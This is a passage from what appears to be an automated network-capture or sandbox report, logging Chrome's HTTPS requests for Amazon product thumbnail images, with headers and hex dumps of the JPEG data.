                                                                                                                                                                                                                                                                Data Ascii: {,EQEY!E?*!1AQa@q 0P?!G<*9HTZ-0FI/0EXs`2ers}!&Y;'`Ae(AP aG'`G*1NxB#FS|gh#E0r3|)Q"wv2P8N
                                                                                                                                                                                                                                                                2024-08-12 13:23:41 UTC1378INData Raw: 89 a9 f5 9b 98 50 f9 fd c7 6d 18 81 c1 aa 00 7f a7 ff c4 00 2a 10 01 00 02 02 00 05 04 03 00 03 00 03 00 00 00 00 01 00 11 21 31 41 51 61 71 b1 40 81 91 a1 c1 d1 f0 10 e1 f1 20 30 50 ff da 00 08 01 01 00 01 3f 10 ff 00 e2 b2 97 4e 21 59 7e 73 a7 fb 9d 37 dc e8 3e 59 d4 3e 5f d4 79 c7 cb 17 ba 82 f2 91 2e 43 66 1a c3 ff 00 82 84 d9 7c 48 d0 25 b5 7a 1c a6 cb 39 16 43 52 fe 26 92 df 69 71 75 4e f8 38 d8 be 65 41 b2 5f c4 2a 87 6a c6 b2 d5 75 77 99 62 02 d1 16 ca e1 b2 dc e4 3f 3f c1 36 90 4d b7 f2 1e 62 fc de c5 e6 e2 4a a0 33 41 a2 a0 cd 97 11 e8 45 d9 e8 55 04 8a ec 4c c8 1c 43 6b e2 44 29 f9 6a c9 6f e2 5f ac 40 b7 10 97 b5 ae ef 1e 0b db 15 26 58 6e 3b 81 c2 3c 8e 67 a2 14 68 af 27 20 16 50 30 73 d2 2c cd 06 0e 52 69 b3 85 46 50 41 6c 0b d0 39 45 b5 09
                                                                                                                                                                                                                                                                Data Ascii: Pm*!1AQaq@ 0P?N!Y~s7>Y>_y.Cf|H%z9CR&iquN8eA_*juwb??6MbJ3AEULCkD)jo_@&Xn;<gh' P0s,RiFPAl9E
                                                                                                                                                                                                                                                                2024-08-12 13:23:41 UTC925INData Raw: fa 30 f3 63 c3 89 8a ec 17 ca 5c 36 7b a6 bc d4 36 48 37 66 be a1 98 55 de 3b 35 e8 36 f7 21 a7 81 6f 62 18 a7 db cc a7 7a 54 10 a0 f2 b1 a9 81 78 dd 16 ec 01 00 29 9d 00 a0 ed 7a 6c c5 a7 3b 80 5d 28 5f 52 67 45 e3 e4 c3 87 fe 88 8f 2f 8c cf 6b be 27 b9 15 70 ae cb 03 4f 6b f8 3f a9 fc dd 5f 40 2b da f3 1b 8f 88 49 a7 91 4b e3 9d ab d7 9c d2 87 2f 07 93 da a5 01 11 3c 0c f3 45 61 46 57 7d ae 04 46 5b 13 62 54 d7 16 85 08 8d c7 f3 69 4a 28 8a 7b bd a5 38 47 6f cc 78 28 5b 50 68 0d 07 08 16 8f e0 89 e6 20 b8 42 5d 86 0f 01 4f 7b 23 fe 7a 47 f6 f5 7a 0f 1b c9 33 e8 2c ac 06 a6 a8 c2 bc 61 ab 7f 13 18 cf 8a ac 70 2b 8a 86 39 a1 ab 87 34 42 ab b6 f2 a8 10 c2 39 0b b0 5a 46 c4 b0 7f a5 41 74 43 9e e0 0a 19 40 6c bb 84 e5 2b 85 ca 17 d1 ff 00 09 d4 af a8 a1 90
                                                                                                                                                                                                                                                                Data Ascii: 0c\6{6H7fU;56!obzTx)zl;](_RgE/k'pOk?_@+IK/<EaFW}F[bTiJ({8Gox([Ph B]O{#zGz3,ap+94B9ZFAtC@l+


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                122192.168.2.44999918.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:41 UTC611OUTGET /images/I/41tYpVlGR4L._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:41 UTC815INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 8863
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: 6355797a-9207-48f2-ba28-4137e960eced
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 08:09:02 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Wed, 31 Jan 2024 06:41:23 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-068,/images/I/41tYpVlGR4L
                                                                                                                                                                                                                                                                Expires: Sun, 07 Aug 2044 08:09:02 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-068 /images/I/41tYpVlGR4L
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 31d06ae261b40b074730272856c3fe20.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Age: 9244
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: gqnBNVNNtXyQ1r13zAp7d8JMrIDwoaUH0mqvKQZ5GdCML7VUgGwIEw==
                                                                                                                                                                                                                                                                2024-08-12 13:23:41 UTC8863INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 32 00 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 05 06 03 04 00 02 07 01 08 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fb 2f 32 a0 40 49 25 5e 0e bc ac 79 66 c1 8c eb
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"2/2@I%^yf


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                123192.168.2.44999818.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:41 UTC611OUTGET /images/I/31AGMSYB+OL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:41 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 2801
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: bffd77dd-90ce-4313-95bb-6d35f32c49ca
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:41 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 18 Sep 2023 06:18:52 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-553,/images/I/31AGMSYB+OL
                                                                                                                                                                                                                                                                Expires: Sun, 07 Aug 2044 13:23:41 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-553 /images/I/31AGMSYB+OL
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 9adf50a068a92adaab58cf6a21118640.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: jqZ7Ui2vqGvOErIOcYS9pVnaL2yhrY8SasM3jaykOA92dZQioMseiQ==
                                                                                                                                                                                                                                                                2024-08-12 13:23:41 UTC2801INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 31 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 03 06 07 08 09 04 02 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 dc b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"1


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                124192.168.2.450003151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:41 UTC378OUTGET /images/I/21nsiubzhVL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:41 UTC674INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 2963
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 3646dfb4-bed7-4e80-8274-7d7edb9a2a80
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Thu, 15 Sep 2022 08:23:14 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                Expires: Sat, 06 Aug 2044 20:39:49 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 60232
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:41 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200045-IAD, cache-ewr18153-EWR
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:41 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 30 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 01 08 07 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fb 2c 00 00 20 4b dd 75 e6 4f b8 be 59 95 ee 17 86 73
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"0, KuOYs
                                                                                                                                                                                                                                                                2024-08-12 13:23:41 UTC1378INData Raw: 98 69 e6 54 72 c6 19 e9 20 c3 3d 21 92 2d 1d 8a a9 9b 32 b9 06 c1 bf 15 7f 50 53 37 71 54 14 c5 e6 a2 59 bb 6a ba f0 12 5b dc f4 12 5b 68 89 12 de dc c7 a4 96 de 02 45 18 fc 5b 35 c4 0e 07 2d 83 f9 63 81 d1 e2 1e de 08 ff c4 00 29 10 00 01 03 01 06 07 00 03 01 00 00 00 00 00 00 00 01 00 11 31 21 10 30 40 41 61 71 20 51 81 a1 b1 c1 f0 91 d1 e1 f1 ff da 00 08 01 01 00 01 3f 21 b8 22 cd 31 35 35 31 31 37 55 b8 b7 96 e2 dc b0 00 73 c0 94 21 a5 8d c4 dc 15 0e 84 20 5f 00 56 00 1a 3a 24 04 48 12 80 04 a0 03 5d 90 81 f3 d9 10 fd 7c 26 cb c7 21 d4 46 61 10 08 90 9c 20 06 11 ae 07 91 fa 2b 30 89 44 ba 39 17 c0 7a 5f e6 3f 48 ab 98 d0 10 9d 11 b0 a6 10 06 25 a0 e8 a8 33 3f b1 f3 80 0a b6 16 65 c0 75 a7 58 03 a1 fa a9 9c df 80 7f a8 c0 ce 39 c2 3c 07 63 2e da b3 9e
                                                                                                                                                                                                                                                                Data Ascii: iTr =!-2PS7qTYj[[hE[5-c)1!0@Aaq Q?!"155117Us! _V:$H]|&!Fa +0D9z_?H%3?euX9<c.
                                                                                                                                                                                                                                                                2024-08-12 13:23:41 UTC207INData Raw: 18 c6 7a 51 58 74 0a 2a cd df ce d1 f8 dc 98 07 c8 e7 13 2c a5 a2 b8 8a 96 8a 8a 8a 89 12 23 52 1f 9a 8f 02 9c 66 1f 2e 93 28 e8 0d 94 58 a2 bc 96 9f 0e b0 b9 4c a1 ab db a2 12 34 91 a2 17 ad 46 4b 18 2e af 84 77 5f 11 f2 78 8f 93 c1 3e 5f 04 db 2f 88 ab 18 20 01 67 6a e0 48 ca 5f a6 05 b1 a7 36 52 53 e9 01 0c 1c 2c 87 42 65 2e d7 f8 55 d9 9d 99 d9 80 6d 07 87 1f 55 a9 49 59 4f f1 ff 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 ff da 00 08 01 02 01 09 3f 00 52 ff c4 00 19 11 00 01 05 00 00 00 00 00 00 00 00 00 00 00 00 00 31 00 30 50 70 71 ff da 00 08 01 03 01 09 3f 00 85 2f 15 94 f7 ff d9
                                                                                                                                                                                                                                                                Data Ascii: zQXt*,#Rf.(XL4FK.w_x>_/ gjH_6RS,Be.UmUIYOp?R10Ppq?/


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                125192.168.2.45000218.239.85.2234437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC611OUTGET /images/I/41WmXJZiubL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                Content-Length: 9532
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Server: Server
                                                                                                                                                                                                                                                                X-Amz-Ir-Id: c0e033eb-060a-43ef-90b6-d0bd32d00a01
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:42 GMT
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Mon, 23 May 2022 10:54:45 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Edge-Cache-Tag: x-cache-046,/images/I/41WmXJZiubL
                                                                                                                                                                                                                                                                Expires: Sun, 07 Aug 2044 13:23:42 GMT
                                                                                                                                                                                                                                                                Surrogate-Key: x-cache-046 /images/I/41WmXJZiubL
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Via: 1.1 0f9c1f26e53d95127196e190a08a56b8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                X-Amz-Cf-Id: _4OCRS3AerXI4OYc95elIdxDhk-H8ZV0MY3pPPIq6PN6gCpvd9SqNQ==
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC9532INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 00 04 05 06 07 08 03 02 01 09 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 01 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d9 60 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"3`


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                126192.168.2.450012151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC714OUTGET /images/G/39/VAS_MENA/2024/GW/QC/Furniture/XCM_CUTTLE_ORIGIN_1707658_3701318_186x116_1X_en_AE_Version_3._SY116_CB561430975_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC652INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 1888
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: c095514b-e814-495e-9af1-afb3f3cf2349
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Wed, 27 Mar 2024 21:51:16 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Tue, 21 Jun 2044 11:44:52 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1643396
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:42 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200060-IAD, cache-ewr18142-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 32 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 06 03 04 07 02 08 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fa 0c 76 f1 80 00 00 00 00 00 00 00 00 00 23 49
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"2v#I
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC510INData Raw: fc 52 b4 c3 8e 85 00 77 29 3e 04 18 0f b6 9f b5 09 9b 6c 8e b0 ef 8f 48 6f b6 3b c4 2d e6 fb 43 be 12 fa 36 28 77 c7 a4 27 b6 3b e0 be 02 ba e0 fc 60 cc 82 07 3f c6 0c d6 f5 f8 c1 7c 11 d7 1f 34 67 1d b1 df 0a 74 f6 a3 8f 20 e8 bf 18 7d c2 a5 ea 6f a4 70 50 c9 7a ba d1 fe 9b 2f 13 dd 93 f5 7b 0e 12 9a 42 e8 53 ca 71 41 29 6c 36 b2 48 27 a8 a1 14 fc 0d 53 9a 6c bc f3 5e 8c 01 16 4b dc c5 aa fb 42 46 62 3e 36 89 ac 3a fc b1 d4 a4 fd d7 fa 41 a5 bd ba 05 31 ed b1 ea e7 b7 43 74 d7 52 4e 91 ea f7 77 42 9a 21 e4 b0 53 ce 52 14 a1 ba c9 21 27 c4 c7 ab 9c dd 06 9a ef 66 15 4b 72 fd 58 14 b7 36 a0 41 a5 2e fd 51 12 98 42 66 6e dc 5e 41 7d e4 8f d3 0e f0 5d 56 0c 2d d4 06 9c ca 09 08 4a c9 5a ad b0 02 90 2e 63 82 0a 62 9a 9f 9d 71 de 63 ad 31 95 6c 2d 0e 36 f2 38
                                                                                                                                                                                                                                                                Data Ascii: Rw)>lHo;-C6(w';`?|4gt }opPz/{BSqA)l6H'Sl^KBFb>6:A1CtRNwB!SR!'fKrX6A.QBfn^A}]V-JZ.cbqc1l-68


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                127192.168.2.450007151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:42 UTC700OUTGET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610033_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1
